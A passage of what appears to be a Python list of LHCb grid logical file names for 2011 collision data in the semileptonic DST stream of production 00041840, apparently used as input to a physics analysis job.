'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024050_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061953_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027493_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065443_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001410_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023635_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039028_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064776_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040152_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013851_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019483_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069332_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065147_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009031_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050634_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027191_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055468_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030190_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064456_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003845_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063803_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062803_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037777_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034968_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023313_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061675_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062323_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054217_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002783_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031237_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040193_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017283_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025799_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026199_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039212_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062236_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000505_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050656_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066285_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067352_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008675_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045338_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000725_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054252_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020203_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005141_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065226_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040037_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047611_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026505_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003592_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047812_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012607_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031399_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042562_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033846_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052494_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056991_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007226_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042969_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051752_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054778_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060872_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050237_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032695_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036339_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019039_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022264_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038318_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060076_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069420_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062176_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040397_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044687_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054978_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004047_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045356_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020205_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031792_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060907_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000709_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066861_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011151_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020201_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029038_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019666_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056924_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066163_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000613_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031509_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057706_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063143_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005383_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067035_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004911_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010833_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033772_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005865_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019387_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068643_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036218_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039701_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040769_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034114_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013134_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063287_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056209_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052084_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009860_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032452_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040319_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059142_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056322_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011802_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016041_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046475_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032108_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067717_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066165_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000551_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056815_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016884_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060281_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021865_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015946_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007353_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040449_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042751_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014485_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017324_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004353_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054330_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035263_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060763_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064118_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023315_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007253_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013938_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024943_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021608_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063631_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016620_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018014_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035078_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029184_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017165_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048546_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059144_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024656_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023557_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054421_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061310_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056992_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036988_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052387_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004302_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067967_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055065_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002974_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052285_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059615_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034737_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020286_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012949_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062046_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021504_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011410_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004744_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060059_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056633_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052625_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059433_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027364_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068050_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057795_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011548_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013589_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063663_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007399_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066888_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008945_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041094_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008407_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010810_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008278_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007043_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027446_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060970_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003717_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068764_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012812_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044658_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036266_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060620_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019940_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050298_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045340_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063861_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019798_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022728_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011284_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063988_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046201_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005426_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027303_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016882_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064971_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010000_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017323_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057757_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059590_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043970_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050817_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013396_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032336_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048328_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045642_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023408_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023195_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034788_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051948_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020761_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022610_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027289_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053536_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051225_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064484_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009248_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049400_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019016_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047922_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063386_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049277_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013244_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019566_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060264_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032979_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029964_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046513_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001478_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032125_1.semileptonic.dst',
